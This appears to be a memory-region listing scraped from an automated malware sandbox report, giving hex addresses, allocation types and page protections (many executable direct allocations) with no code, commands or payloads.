AD76000
direct allocation
page execute and read and write
BE51000
direct allocation
page execute and read and write
442000
unkown
page readonly
237F000
stack
page read and write
A68E000
direct allocation
page execute and read and write
B0A3000
direct allocation
page execute and read and write
BA30000
direct allocation
page execute and read and write
229AC000
trusted library allocation
page read and write
BA91000
direct allocation
page execute and read and write
88D0000
trusted library allocation
page execute and read and write
229CC000
trusted library allocation
page read and write
228F0000
trusted library allocation
page read and write
24D30000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B6CD000
direct allocation
page execute and read and write
BA7C000
direct allocation
page execute and read and write
B734000
direct allocation
page execute and read and write
B10B000
direct allocation
page execute and read and write
BF53000
direct allocation
page execute and read and write
AFD2000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
B1CE000
direct allocation
page execute and read and write
B464000
direct allocation
page execute and read and write
21E98000
trusted library allocation
page read and write
BBD8000
direct allocation
page execute and read and write
3140000
heap
page read and write
B13E000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
BF42000
direct allocation
page execute and read and write
25700000
trusted library allocation
page read and write
AC0D000
direct allocation
page execute and read and write
AF73000
direct allocation
page execute and read and write
B2D2000
direct allocation
page execute and read and write
C00E000
direct allocation
page execute and read and write
8320000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
BAD8000
direct allocation
page execute and read and write
ACED000
direct allocation
page execute and read and write
24991000
heap
page read and write
B686000
direct allocation
page execute and read and write
ADC5000
direct allocation
page execute and read and write
B7C5000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
A736000
direct allocation
page execute and read and write
24C90000
trusted library allocation
page read and write
23FA1000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
A745000
direct allocation
page execute and read and write
B9CE000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B6D6000
direct allocation
page execute and read and write
704A000
heap
page read and write
BC36000
direct allocation
page execute and read and write
25700000
trusted library allocation
page read and write
3423000
trusted library allocation
page execute and read and write
22B66000
trusted library allocation
page read and write
74A6000
heap
page read and write
25770000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B501000
direct allocation
page execute and read and write
AEFF000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
89A7000
heap
page read and write
ADDA000
direct allocation
page execute and read and write
BB96000
direct allocation
page execute and read and write
BA93000
direct allocation
page execute and read and write
B036000
direct allocation
page execute and read and write
BA03000
direct allocation
page execute and read and write
22DF5000
trusted library allocation
page read and write
A7BF000
direct allocation
page execute and read and write
BECD000
direct allocation
page execute and read and write
BB35000
direct allocation
page execute and read and write
B508000
direct allocation
page execute and read and write
BCA2000
direct allocation
page execute and read and write
25800000
trusted library allocation
page read and write
BBB7000
direct allocation
page execute and read and write
BA23000
direct allocation
page execute and read and write
BB3A000
direct allocation
page execute and read and write
B43F000
direct allocation
page execute and read and write
220D9000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
BA99000
direct allocation
page execute and read and write
BD97000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
B587000
direct allocation
page execute and read and write
5990000
remote allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
AEA0000
direct allocation
page execute and read and write
B1F4000
direct allocation
page execute and read and write
A6C3000
direct allocation
page execute and read and write
BCF6000
direct allocation
page execute and read and write
86FE000
stack
page read and write
B754000
direct allocation
page execute and read and write
B030000
direct allocation
page execute and read and write
BDEE000
direct allocation
page execute and read and write
4DCE000
stack
page read and write
BC7E000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
25040000
trusted library allocation
page read and write
23099000
trusted library allocation
page read and write
8923000
heap
page read and write
596000
trusted library allocation
page execute and read and write
BB13000
direct allocation
page execute and read and write
AFD8000
direct allocation
page execute and read and write
BCC0000
direct allocation
page execute and read and write
25710000
trusted library allocation
page read and write
B555000
direct allocation
page execute and read and write
B3B4000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BA2D000
direct allocation
page execute and read and write
4C8000
heap
page read and write
B8A6000
direct allocation
page execute and read and write
AE30000
direct allocation
page execute and read and write
3D30000
remote allocation
page execute and read and write
231C1000
trusted library allocation
page read and write
65EA000
heap
page read and write
BD7E000
direct allocation
page execute and read and write
B311000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
3440000
trusted library allocation
page read and write
22600000
remote allocation
page read and write
25040000
trusted library allocation
page read and write
B55F000
direct allocation
page execute and read and write
BAC0000
direct allocation
page execute and read and write
B41E000
direct allocation
page execute and read and write
B61C000
direct allocation
page execute and read and write
24C70000
trusted library allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
AFF2000
direct allocation
page execute and read and write
B36F000
direct allocation
page execute and read and write
BA5F000
direct allocation
page execute and read and write
B6FE000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BA8B000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
BCC9000
direct allocation
page execute and read and write
8C10000
trusted library allocation
page read and write
BA8F000
direct allocation
page execute and read and write
B890000
direct allocation
page execute and read and write
BC8D000
direct allocation
page execute and read and write
BFEC000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
B71C000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
23B63000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
AC37000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
245AE000
stack
page read and write
AB65000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
AC09000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
ACEA000
direct allocation
page execute and read and write
BB17000
direct allocation
page execute and read and write
7A60000
trusted library allocation
page read and write
B327000
direct allocation
page execute and read and write
2F93000
trusted library allocation
page execute and read and write
2124000
heap
page read and write
BA65000
direct allocation
page execute and read and write
BB6A000
direct allocation
page execute and read and write
B54F000
direct allocation
page execute and read and write
B4E0000
direct allocation
page execute and read and write
B3FF000
direct allocation
page execute and read and write
B5DC000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
792C000
heap
page read and write
BBDE000
direct allocation
page execute and read and write
AEC9000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
B00A000
direct allocation
page execute and read and write
BE0C000
direct allocation
page execute and read and write
BA59000
direct allocation
page execute and read and write
AD79000
direct allocation
page execute and read and write
7910000
trusted library allocation
page read and write
B648000
direct allocation
page execute and read and write
22BB0000
trusted library allocation
page read and write
6037000
trusted library allocation
page read and write
BA65000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B561000
direct allocation
page execute and read and write
B875000
direct allocation
page execute and read and write
B001000
direct allocation
page execute and read and write
B8B9000
direct allocation
page execute and read and write
230E0000
trusted library allocation
page read and write
B421000
direct allocation
page execute and read and write
AFA5000
direct allocation
page execute and read and write
B117000
direct allocation
page execute and read and write
B932000
direct allocation
page execute and read and write
BCF6000
direct allocation
page execute and read and write
ABC7000
direct allocation
page execute and read and write
ACEB000
direct allocation
page execute and read and write
B038000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
BFA0000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
21FB1000
trusted library allocation
page read and write
B1D3000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
B671000
direct allocation
page execute and read and write
23FB0000
trusted library allocation
page read and write
21E54000
trusted library allocation
page read and write
ADA2000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
24C70000
trusted library allocation
page read and write
BB2C000
direct allocation
page execute and read and write
B85D000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
24D95000
trusted library allocation
page read and write
BE61000
direct allocation
page execute and read and write
22C00000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
AD82000
direct allocation
page execute and read and write
B585000
direct allocation
page execute and read and write
A938000
direct allocation
page execute and read and write
B297000
direct allocation
page execute and read and write
B977000
direct allocation
page execute and read and write
B758000
direct allocation
page execute and read and write
BB29000
direct allocation
page execute and read and write
ADC5000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
BBB4000
direct allocation
page execute and read and write
2297F000
trusted library allocation
page read and write
22969000
trusted library allocation
page read and write
B240000
direct allocation
page execute and read and write
B0E5000
direct allocation
page execute and read and write
B09C000
direct allocation
page execute and read and write
AEE1000
direct allocation
page execute and read and write
86B5000
trusted library allocation
page read and write
2E2E000
stack
page read and write
B4A6000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
2F80000
trusted library allocation
page read and write
AE9E000
direct allocation
page execute and read and write
B475000
direct allocation
page execute and read and write
B857000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
ACD0000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
A992000
direct allocation
page execute and read and write
BA4B000
direct allocation
page execute and read and write
AD89000
direct allocation
page execute and read and write
219CC000
stack
page read and write
AE4E000
direct allocation
page execute and read and write
AD2E000
direct allocation
page execute and read and write
B8A9000
direct allocation
page execute and read and write
86D0000
trusted library allocation
page read and write
70FF000
heap
page read and write
230F3000
trusted library allocation
page read and write
B38C000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B5C5000
direct allocation
page execute and read and write
22987000
trusted library allocation
page read and write
24AA0000
trusted library allocation
page read and write
524000
heap
page read and write
256D0000
trusted library allocation
page read and write
BE4F000
direct allocation
page execute and read and write
B60E000
direct allocation
page execute and read and write
AE38000
direct allocation
page execute and read and write
AE66000
direct allocation
page execute and read and write
BA2F000
direct allocation
page execute and read and write
7C90000
trusted library allocation
page read and write
703E000
stack
page read and write
240A6000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
AF95000
direct allocation
page execute and read and write
8BFE000
stack
page read and write
B3AA000
direct allocation
page execute and read and write
B38A000
direct allocation
page execute and read and write
B822000
direct allocation
page execute and read and write
B3D8000
direct allocation
page execute and read and write
B007000
direct allocation
page execute and read and write
BA7D000
direct allocation
page execute and read and write
C023000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
5028000
trusted library allocation
page read and write
78B0000
trusted library allocation
page read and write
B2CF000
direct allocation
page execute and read and write
B633000
direct allocation
page execute and read and write
ADEA000
direct allocation
page execute and read and write
70F7000
heap
page read and write
7580000
trusted library allocation
page read and write
3200000
heap
page read and write
BB94000
direct allocation
page execute and read and write
257A0000
trusted library allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
AE08000
direct allocation
page execute and read and write
22C8B000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
B29B000
direct allocation
page execute and read and write
8C00000
trusted library allocation
page read and write
A99F000
direct allocation
page execute and read and write
B948000
direct allocation
page execute and read and write
B1A0000
direct allocation
page execute and read and write
24DC0000
trusted library allocation
page read and write
77FE000
stack
page read and write
B29C000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
A5A7000
direct allocation
page execute and read and write
B42E000
direct allocation
page execute and read and write
B1B4000
direct allocation
page execute and read and write
B0D1000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
AF2F000
direct allocation
page execute and read and write
B551000
direct allocation
page execute and read and write
300B000
heap
page read and write
B43E000
direct allocation
page execute and read and write
8B7C000
stack
page read and write
BBDC000
direct allocation
page execute and read and write
24314000
heap
page read and write
560000
trusted library allocation
page read and write
BC4E000
direct allocation
page execute and read and write
9300000
heap
page read and write
BA95000
direct allocation
page execute and read and write
AFA3000
direct allocation
page execute and read and write
24BB1000
heap
page read and write
256E0000
trusted library allocation
page read and write
753A000
heap
page read and write
B08A000
direct allocation
page execute and read and write
22064000
trusted library allocation
page read and write
BC40000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
BC34000
direct allocation
page execute and read and write
BBA8000
direct allocation
page execute and read and write
AE52000
direct allocation
page execute and read and write
21D3E000
stack
page read and write
B644000
direct allocation
page execute and read and write
B9EF000
direct allocation
page execute and read and write
B820000
direct allocation
page execute and read and write
AF4E000
direct allocation
page execute and read and write
B0B4000
direct allocation
page execute and read and write
23F40000
trusted library allocation
page read and write
BB63000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B15A000
direct allocation
page execute and read and write
B6D7000
direct allocation
page execute and read and write
23F40000
trusted library allocation
page read and write
B1C3000
direct allocation
page execute and read and write
2309F000
trusted library allocation
page read and write
AC35000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
BA07000
direct allocation
page execute and read and write
B2B1000
direct allocation
page execute and read and write
B19D000
direct allocation
page execute and read and write
ADAE000
direct allocation
page execute and read and write
6510000
direct allocation
page read and write
4F02000
trusted library allocation
page read and write
BEB2000
direct allocation
page execute and read and write
24C15000
heap
page read and write
B06F000
direct allocation
page execute and read and write
B25F000
direct allocation
page execute and read and write
2204C000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
B9B0000
direct allocation
page execute and read and write
B516000
direct allocation
page execute and read and write
BCAF000
direct allocation
page execute and read and write
BC23000
direct allocation
page execute and read and write
BBEE000
direct allocation
page execute and read and write
BD70000
direct allocation
page execute and read and write
B46A000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
A734000
direct allocation
page execute and read and write
B83A000
direct allocation
page execute and read and write
2289C000
stack
page read and write
24C80000
trusted library allocation
page read and write
25780000
trusted library allocation
page read and write
AD9D000
direct allocation
page execute and read and write
70FD000
heap
page read and write
BBF0000
direct allocation
page execute and read and write
B1A2000
direct allocation
page execute and read and write
BA89000
direct allocation
page execute and read and write
BD52000
direct allocation
page execute and read and write
B8CF000
direct allocation
page execute and read and write
23F20000
trusted library allocation
page read and write
B142000
direct allocation
page execute and read and write
B773000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
B4D7000
direct allocation
page execute and read and write
227BE000
stack
page read and write
AF6E000
direct allocation
page execute and read and write
2391F000
trusted library allocation
page read and write
400000
unkown
page readonly
A98E000
direct allocation
page execute and read and write
7860000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
BFF6000
direct allocation
page execute and read and write
23043000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
25050000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
AF4D000
direct allocation
page execute and read and write
76DE000
stack
page read and write
B5E4000
direct allocation
page execute and read and write
23FA1000
trusted library allocation
page read and write
A1D0000
direct allocation
page execute and read and write
7C20000
trusted library allocation
page read and write
24A90000
trusted library allocation
page read and write
B68C000
direct allocation
page execute and read and write
70C0000
heap
page read and write
24C80000
trusted library allocation
page read and write
839E000
stack
page read and write
B45D000
direct allocation
page execute and read and write
BE03000
direct allocation
page execute and read and write
24E2E000
stack
page read and write
21F7A000
trusted library allocation
page read and write
B94A000
direct allocation
page execute and read and write
25820000
trusted library allocation
page read and write
8B3E000
stack
page read and write
24D30000
trusted library allocation
page read and write
4D8E000
stack
page read and write
8BBE000
stack
page read and write
7900000
trusted library allocation
page read and write
6E47000
heap
page read and write
BD99000
direct allocation
page execute and read and write
23FB0000
trusted library allocation
page read and write
23FB0000
trusted library allocation
page read and write
B8AB000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
B842000
direct allocation
page execute and read and write
B03D000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
65F1000
heap
page read and write
AB5A000
direct allocation
page execute and read and write
B76F000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
22046000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
3439000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
BADE000
direct allocation
page execute and read and write
2211D000
trusted library allocation
page read and write
A565000
direct allocation
page execute and read and write
AD43000
direct allocation
page execute and read and write
B9C5000
direct allocation
page execute and read and write
B5B3000
direct allocation
page execute and read and write
BBAB000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
256C0000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
BCD8000
direct allocation
page execute and read and write
B82F000
direct allocation
page execute and read and write
B7DE000
direct allocation
page execute and read and write
BA1B000
direct allocation
page execute and read and write
241B1000
heap
page read and write
BC62000
direct allocation
page execute and read and write
409000
unkown
page read and write
AD64000
direct allocation
page execute and read and write
6629000
heap
page read and write
BA0F000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
AC49000
direct allocation
page execute and read and write
BC87000
direct allocation
page execute and read and write
BEBE000
direct allocation
page execute and read and write
B6A3000
direct allocation
page execute and read and write
23B45000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B252000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
2730000
heap
page readonly
2316F000
trusted library allocation
page read and write
22C02000
trusted library allocation
page read and write
B457000
direct allocation
page execute and read and write
A6D4000
direct allocation
page execute and read and write
B881000
direct allocation
page execute and read and write
BD04000
direct allocation
page execute and read and write
7830000
heap
page execute and read and write
3452000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
6C80000
heap
page read and write
BE63000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
2309C000
trusted library allocation
page read and write
AEE6000
direct allocation
page execute and read and write
7000000
direct allocation
page read and write
256B0000
trusted library allocation
page read and write
B682000
direct allocation
page execute and read and write
BDC4000
direct allocation
page execute and read and write
BFFD000
direct allocation
page execute and read and write
B8E0000
direct allocation
page execute and read and write
22BBC000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
6379000
trusted library allocation
page read and write
B553000
direct allocation
page execute and read and write
25700000
trusted library allocation
page read and write
AD1B000
direct allocation
page execute and read and write
AE3A000
direct allocation
page execute and read and write
2410000
heap
page read and write
BD57000
direct allocation
page execute and read and write
2194F000
stack
page read and write
BB01000
direct allocation
page execute and read and write
AF5E000
direct allocation
page execute and read and write
B62C000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
23CE5000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
BC5E000
direct allocation
page execute and read and write
64F0000
direct allocation
page read and write
BD54000
direct allocation
page execute and read and write
B184000
direct allocation
page execute and read and write
6517000
trusted library allocation
page read and write
BF7A000
direct allocation
page execute and read and write
BE2A000
direct allocation
page execute and read and write
BE57000
direct allocation
page execute and read and write
There are 3541 hidden memdumps, click here to show them.